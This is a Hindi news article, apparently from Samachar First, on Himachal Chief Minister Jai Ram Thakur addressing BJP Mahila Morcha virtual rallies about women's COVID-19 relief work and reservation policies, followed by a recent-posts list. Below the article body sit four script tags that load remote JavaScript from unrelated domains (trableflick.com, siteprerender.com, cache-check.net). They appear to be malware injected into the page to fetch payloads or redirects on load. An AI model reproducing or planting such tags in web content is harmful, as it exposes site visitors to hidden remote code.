मुख्यमंत्री ने पालमपुर और कांगड़ा के भाजपा महिला मोर्चा की वर्चुअल रैलियों को किया संबोधित

<p>मुख्यमंत्री जयराम ठाकुर ने आज शिमला से पालमपुर और कांगड़ा के भाजपा महिला मोर्चा की वर्चुअल रैलियों को संबोधित करते हुए कहा कि कोविड-19 महामारी के दौरान महिलाओं ने प्रदेश के लोगों के लिए फेस मास्क तथा फेस कवर तैयार और वितरित करने का सराहनीय कार्य किया है। मुख्यमंत्री ने कहा कि महिला मोर्चा ने प्रदेश में कर्फ्यू के दौरान जरूरतमंद लोगों को राशन तथा पका हुआ भोजन प्रदान करने में महत्वपूर्ण भूमिका निभाई है। उन्होंने कहा कि तत्काल में हिमाचल प्रदेश भाजपा सरकार के कार्यकाल के दौरान पंचायती राज संस्थानों तथा शहरी स्थानीय निकायों में महिलाओं को 50 प्रतिशत आरक्षण प्रदान करने वाला पहला राज्य था। उन्होंने कहा कि इससे न केवल विकास तथा नीति बनाने में महिलाओं की सक्रिय भागीदारी सुनिश्चित हुई है, बल्कि उन्हें सामाजिक तथा आर्थिक रूप से आत्मनिर्भर भी बनाया है।</p>

<p>जयराम ठाकुर ने कहा कि महिलाओं के कल्याण के बिना समाज में विकास तथा प्रगति की कल्पना नहीं की जा सकती क्योंकि महिलाएं विश्व की कुल आबादी का लगभग 50 प्रतिशत भाग है। उन्होंने कहा कि प्रदेश सरकार ने महिला सशिक्तकरण सुनिश्चित करने तथा उन्हें विकास में भागीदार बनाने के लिए अनेक योजनाएं आरंभ की है। जयराम ठाकुर ने कहा कि लड़कियां प्रत्येक क्षेत्र में बेहतरीन प्रदर्शन कर रही है। उन्होंने कहा कि प्रदेश सरकार ने मंत्रिमंडल की प्रथम बैठक में महिलाओं की सुरक्षा सुनिश्चित करने के लिए गुड़िया हेल्पलाईन आरंभ की थी।</p>

<p>पूर्व मुख्यमंत्री शांता कुमार ने कहा कि जब पूरा विश्व कोरोना महामारी के खिलाफ लड़ रहा है तो ऐसे समय में महिलाएं न केवल मास्क बनाने तथा वितरित करने में महत्वपूर्ण भूमिका निभा रही हैं, बल्कि यह भी सुनिश्चित कर रहीं है कि लोग होम क्वांरटीन की अवेहलना न करें। उन्होंने महिलाओं से अधिक समर्पण तथा जिमेदारी के साथ कार्य करने का आवाहन किया ताकि भाजपा मुख्यमंत्री जय राम ठाकुर के नेतृत्व में दोबारा सरकार बनाने मे सफल हो। शहरी विकास मंत्री सरवीन चैधरी ने कहा कि महिलाओं ने लगभग हर क्षेत्र में अपनी प्रतिभा को साबित किया है। उन्होंने महिलाओं के सशिक्तकरण के लिए अनेक योजनाएं आरंभ करने के लिए मुख्यमंत्री का धन्यवाद किया।</p>

<p>राज्य महिला मोर्चा की अध्यक्ष रश्मि धर सूद ने वर्चुअल रैली में मुख्यमंत्री का स्वागत किया। राज्य भाजपा महासचिव त्रिलोक कपूर ने पार्टी के कार्यकर्ताओं का मनोबल बढ़ाने के लिए वर्चुअल रैली में अपना बहुमूल्य समय देकर भाग लेने के लिए मुख्यमंत्री का आभार व्यक्त किया। सांसद इंदु गोस्वामी, विधायक मुल्ख राज प्रेमी, रवि धीमान, रीता धीमान, अरूण मैहरा तथा विशाल नेहरिया, पूर्व विधायक संजय चैधरी ने भी वर्चुअल रैलियों में भाग लिया।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1593353970417″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

संजौली मस्जिद विवाद : चार अलग-अलग मामलों में 185 आरोपी बनाए,एफआईआर में भाजपा के राज्य कोषाध्यक्ष, विहिप के प्रांत मंत्री भी नामजद

  समाचार फर्स्‍ट नेटवर्क Shimla: संजौली मस्जिद में अवैध निर्माण के विरोध में प्रदर्शन करने…

2 hours ago

खुला नौकरियों का पिटारा: नगरोटा में ही 5000 युवाओं को रोजगार देने का लक्ष्य: बाली

 सिटी ग्रुप ने आयोजित किया रोजगार मेला, 300 का हुआ चयन 35 कंपनियों ने लिया…

6 hours ago

हमीरपुर में गणेश विसर्जन की धूम

  Hamirpur: गणेश महोत्सव के आयोजन के दौरान अंतिम दिन गणेश मूर्ति के विसर्जन से…

7 hours ago

उचित पोषण के लिए दैनिक आहार में विविधता जरूरी: सीडीपीओ

  Hamirpur:महिला एवं बाल विकास विभाग ने राष्ट्रीय पोषण माह के उपलक्ष्य पर सोमवार को…

7 hours ago

हमीरपुर में सदस्यता अभियान पकड़ेगा रफतार, कश्‍यप ने ली बैठक

  Hamirpur: भारतीय जनता पार्टी का देश भर में चला सदस्यता अभियान हिमाचल में भी…

7 hours ago

रंगस स्कूल के विद्यार्थियों को समझाए मौलिक कर्तव्य

  Hamirpur:जिला विधिक सेवाएं प्राधिकरण ने सोमवार को अंतर्राष्ट्रीय ओजोन परत संरक्षण दिवस के उपलक्ष्य…

7 hours ago